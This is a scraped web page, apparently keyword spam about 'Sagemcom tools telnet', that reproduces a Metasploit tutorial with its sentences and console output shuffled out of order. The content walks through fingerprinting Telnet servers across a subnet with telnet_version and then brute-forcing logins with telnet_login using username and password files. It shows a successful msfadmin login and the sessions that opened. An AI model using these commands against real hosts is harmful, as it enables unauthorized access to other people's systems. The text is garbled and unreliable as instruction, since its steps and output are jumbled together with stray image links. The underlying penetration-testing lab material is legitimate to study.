Msf auxiliary( telnet_version) > set THREADS 254 Msf auxiliary( telnet_version) > set RHOSTS 192.168.1.0/24 USERNAME no The username to authenticate as TIMEOUT 30 yes Timeout for the Telnet probe
#Sagemcom tools telnet password
PASSWORD no The password for the specified username Msf auxiliary( telnet_version) > show options msf > use auxiliary/scanner/telnet/telnet_version We just need to pass a range of IPs to the module, set our THREADS value, and let it fly. The telnet_version auxiliary module will scan a subnet and fingerprint any Telnet servers that are running. Msf auxiliary(telnet_login) > telnet_versionįrom a network security perspective, one would hope that Telnet would no longer be in use as everything, including credentials is passed in the clear but the fact is, you will still frequently encounter systems running Telnet, particularly on legacy systems. Msf auxiliary( telnet_login) > sessions -i 3 Let’s see if we can interact with one of them. It seems that our scan has been successful and Metasploit has a few sessions open for us. Scanned 256 of 256 hosts (100% complete) Scanned 255 of 256 hosts (099% complete) Scanned 250 of 256 hosts (097% complete) Scanned 248 of 256 hosts (096% complete) 192.168.1.56 - SUCCESSFUL LOGIN msfadmin : msfadmin Scanned 243 of 256 hosts (094% complete) Msf auxiliary( telnet_login) > set VERBOSE false Msf auxiliary( telnet_login) > set USER_FILE users.txt Msf auxiliary( telnet_login) > set THREADS 254 Msf auxiliary( telnet_login) > set PASS_FILE passwords.txt msf auxiliary( telnet_login) > set BLANK_PASSWORDS false We will configure the scanner to use a short usernames file and a passwords file and let it run against our subnet. You can specifically set a username and password, you can pass a list of usernames and a list of passwords for it to iterate through, or you can provide a file that contains usernames and passwords separated by a space.
![sagemcom tools telnet sagemcom tools telnet](https://s1.manualzz.com/store/data/000894662_1-233e0cf0ed68f3458cefe677f6879757.png)
This auxiliary module allows you to pass credentials in a number of ways. VERBOSE true yes Whether to print output for all attempts
![sagemcom tools telnet sagemcom tools telnet](https://interactiveintensive632.weebly.com/uploads/1/2/3/9/123974155/887276551.jpg)
USER_FILE no File containing usernames, one per line USER_AS_PASS false no Try the username as the password for all users USERPASS_FILE no File containing users and passwords separated by space, one pair per line USERNAME no A specific username to authenticate as THREADS 1 yes The number of concurrent threads STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host RHOSTS yes The target address range or CIDR identifier PASS_FILE no File containing passwords, one per line PASSWORD no A specific password to authenticate with Name Current Setting Required DescriptionīLANK_PASSWORDS false no Try blank passwords for all usersīRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5ĭB_ALL_CREDS false no Try each user/password couple stored in the current databaseĭB_ALL_PASS false no Add all passwords in the current database to the listĭB_ALL_USERS false no Add all users in the current database to the list Module options (auxiliary/scanner/telnet/telnet_login): Msf auxiliary( telnet_login) > show options
![sagemcom tools telnet sagemcom tools telnet](https://s1.manualzz.com/store/data/001194870_1-f907538ffa1118150f2ec099f433e29c.png)
msf > use auxiliary/scanner/telnet/telnet_login The telnet_login module will take a list of provided credentials and a range of IP addresses and attempt to login to any Telnet servers it encounters.